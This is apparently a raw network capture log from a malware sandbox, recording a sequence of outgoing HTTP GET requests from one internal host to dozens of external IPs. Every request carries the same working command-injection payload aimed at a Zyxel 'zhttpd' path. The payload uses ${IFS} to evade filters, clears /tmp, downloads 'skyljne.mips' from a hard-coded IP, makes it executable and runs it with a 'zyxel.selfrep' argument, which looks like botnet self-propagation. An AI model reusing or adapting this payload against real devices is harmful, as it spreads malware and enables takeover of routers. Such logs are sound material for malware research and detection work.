                                      Jan 14, 2024 15:50:44.265805006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3907192.168.2.144458220.99.186.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265861988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3908192.168.2.1451420191.177.224.71443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265912056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3909192.168.2.1443658101.223.137.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.265953064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3910192.168.2.1450424211.36.189.80443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266028881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3911192.168.2.1446856189.249.59.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266087055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3912192.168.2.1458836218.137.81.108443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266119957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3913192.168.2.1448034159.89.81.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266150951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3914192.168.2.145449099.88.42.121443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266212940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3915192.168.2.1435930204.42.149.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266302109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3916192.168.2.145306273.39.6.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266340017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3917192.168.2.1436956167.215.6.240443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266402960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3918192.168.2.1434158159.183.49.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266454935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3919192.168.2.1433910213.94.36.96443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266521931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3920192.168.2.1436960109.92.74.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266562939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3921192.168.2.1442380182.36.170.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266611099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3922192.168.2.1456840158.149.255.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266658068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3923192.168.2.1460734166.51.200.225443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266695023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3924192.168.2.1447772102.195.198.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266756058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3925192.168.2.144078038.208.45.115443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.266786098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3926192.168.2.14563405.101.39.190443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.271704912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3927192.168.2.1436788177.77.213.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.271748066 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3928192.168.2.143854851.231.146.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.271781921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3929192.168.2.1450246111.158.9.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.271845102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3930192.168.2.144037299.203.235.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.271883965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3931192.168.2.1460456200.2.135.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.271939993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3932192.168.2.1441864175.105.2.145443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.271994114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3933192.168.2.1451072200.87.141.11443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:44.272047997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3934192.168.2.144348249.177.159.107443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.271289110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3935192.168.2.1443072169.155.70.81443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.271397114 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3936192.168.2.1457660164.110.203.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.271534920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3937192.168.2.143834617.44.16.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.271581888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3938192.168.2.144832680.40.47.33443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.271641970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3939192.168.2.143777620.186.82.212443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.271696091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3940192.168.2.1437896120.65.112.174443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.271730900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3941192.168.2.1454076172.94.111.176443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.271768093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3942192.168.2.1440662142.242.117.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.271826029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3943192.168.2.145967820.76.218.27443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.271886110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3944192.168.2.143628891.116.146.109443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.271929026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3945192.168.2.144102217.242.58.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.271985054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3946192.168.2.144143066.225.54.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272047997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3947192.168.2.145964687.118.236.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272114038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3948192.168.2.1456864185.126.43.245443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272176027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3949192.168.2.1457898170.9.75.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272242069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3950192.168.2.1442368176.213.255.102443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272311926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3951192.168.2.144886017.199.154.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272361040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3952192.168.2.145777045.168.79.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272412062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3953192.168.2.144653423.156.210.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272455931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3954192.168.2.1439590181.72.53.211443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272521019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3955192.168.2.143308019.123.79.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272573948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3956192.168.2.14398548.132.115.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272608995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3957192.168.2.1434886216.82.206.248443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272663116 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3958192.168.2.1435388201.213.38.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272721052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3959192.168.2.1450498183.171.6.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272773981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3960192.168.2.1438628103.203.162.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272831917 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3961192.168.2.1453592198.44.113.237443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272902012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3962192.168.2.1450886123.53.171.167443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.272948980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3963192.168.2.1458924195.73.242.78443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273010969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3964192.168.2.1433446140.132.243.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273072958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3965192.168.2.1443994203.42.135.180443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273102999 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3966192.168.2.143618866.41.157.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273178101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3967192.168.2.1445546126.206.93.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273236990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3968192.168.2.144004290.152.147.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:45.273282051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      3969192.168.2.144505882.135.60.235443
                                      TimestampBytes transferredDirectionData
